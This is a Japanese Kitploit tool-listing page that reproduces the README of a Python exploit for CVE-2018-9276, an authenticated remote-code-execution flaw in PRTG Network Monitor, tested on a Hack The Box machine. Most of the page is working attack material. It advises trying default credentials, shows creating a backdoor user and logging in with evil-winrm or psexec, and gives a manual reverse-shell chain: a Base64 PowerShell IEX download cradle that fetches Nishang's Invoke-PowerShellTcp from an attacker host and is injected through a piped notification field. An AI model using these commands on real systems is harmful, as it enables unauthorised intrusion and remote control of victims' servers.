Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/alvinsmith-eroad/cve-2018-9276
ペイロード生成エクスプロイト横移動ウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールリモートアクセスツール
GitHubalvinsmith-eroad/cve-2018-9276

CVE-2018-9276

CVE-2018-9276 PRTG < 18.2.39 リバースシェル (Python3 サポート)

リポジトリを見る
235年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2018-9276

CVE-2018-9276 PRTG < 18.2.39 リバースシェル (Python3サポート)

依存関係

  • Impacket (python3 バージョン)
  • Netcat
  • Msfvenom

使用方法

root@kitploit:~
git clone https://github.com/A1vinSmith/CVE-2018-9276.git

./exploit.py -i targetIP -p targetPort --lhost hostIP --lport hostPort --user user --password pass
  1. エクスプロイトを実行するには認証情報が必要です。デフォルトの認証情報 prtgadmin:prtgadmin を試してください。また、データベースやログを確認して認証情報を入手する価値があるかもしれません。 https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data
  2. ポートが占有されていない場合は --lport 445 を試してください。
  3. コード内に難解なコメントがいくつかあります。修正が必要かもしれません。
  4. 成功するまでに数回の試行が必要な場合があります。ターゲットマシンを再起動するのは常に良い選択肢です。特にペイロードが何らかの影響を与える場合に有効です。

テストカバレッジ

HTB Netmon box

root@kitploit:~
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00376-30821-30176-AA362
Original Install Date:     2/3/2019, 7:05:45 AM
System Boot Time:          7/28/2021, 9:02:41 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC

クレジット

wildkindcc氏のpython2バージョンに多大なる感謝を https://github.com/wildkindcc/CVE-2018-9276

知識を広げる

Metasploitの使用

https://www.rapid7.com/db/modules/exploit/windows/http/prtg_authenticated_rce/

リモートコード実行

https://www.exploit-db.com/exploits/46527

https://github.com/chcx/PRTG-Network-Monitor-RCE

使用例

エクスプロイトを実行するには認証情報が必要です。まずログインして認証クッキーを取得し、新しいユーザーを追加します。

root@kitploit:~
./prtg-exploit.sh -u http://10.10.10.10 -c "OCTOPUS1813713946=XXX"

// Login as the new user via evil-winrm
evil-winrm -i 10.10.10.10 -u pentest -p 'P3nT3st!'
// or alternative psexec.py
python3 /path/etc/impacket/examples/psexec.py pentest:'P3nT3st!'@10.10.10.10

スクリーンショット 2021-07-29 15:14:10

新しいユーザーを追加せずに手動で高度なエクスプロイト

クレジットはHTBの公式writeupに帰属
POC: https://www.codewatch.org/blog/?p=453 さらにSMBを使用してリバースシェルを取得 https://github.com/A1vinSmith/OSCP-PWK/wiki/Samba-SMB

ユーザーを追加したくない場合、OPSECを向上させるためにリバースシェルを取得できます。しかし、HTMLエンコーディングにより多くの文字がエンコードされます。これを回避するには、PowershellのBase64実行を使用します。Base64エンコードされたコマンドを作成する必要があります。ただし、それはWindowsが使用するエンコーディング、つまり UTF-16LE である必要があります。

root@kitploit:~
❯ echo -n "IEX(new-object net.webclient).downloadstring('http://10.10.10.100/Invoke-PowerShellTcp.ps1' )" | iconv -t UTF-16LE | base64 -w0

SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA= 

iconv を使用してターゲットのエンコーディングに変換し、Nishangからこのリバースシェルを実行します。 https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

スクリプトをダウンロードし、コマンドの最後の行にechoで追加します。

root@kitploit:~
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.100 -Port 4444' >> Invoke-PowerShellTcp.ps1

次に、簡易HTTPサーバーを起動し、新しい通知を作成します。

root@kitploit:~
python3 -m http.server 80

Setup > Account Settings > Notifications をクリックし、右端にある「Add new notification」をクリックします。 ベルボタンをクリックして通知をトリガーします。

root@kitploit:~
abc.txt | powershell -enc SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA= 

スクリーンショット 2021-07-29 16:08:01

ツールをダウンロード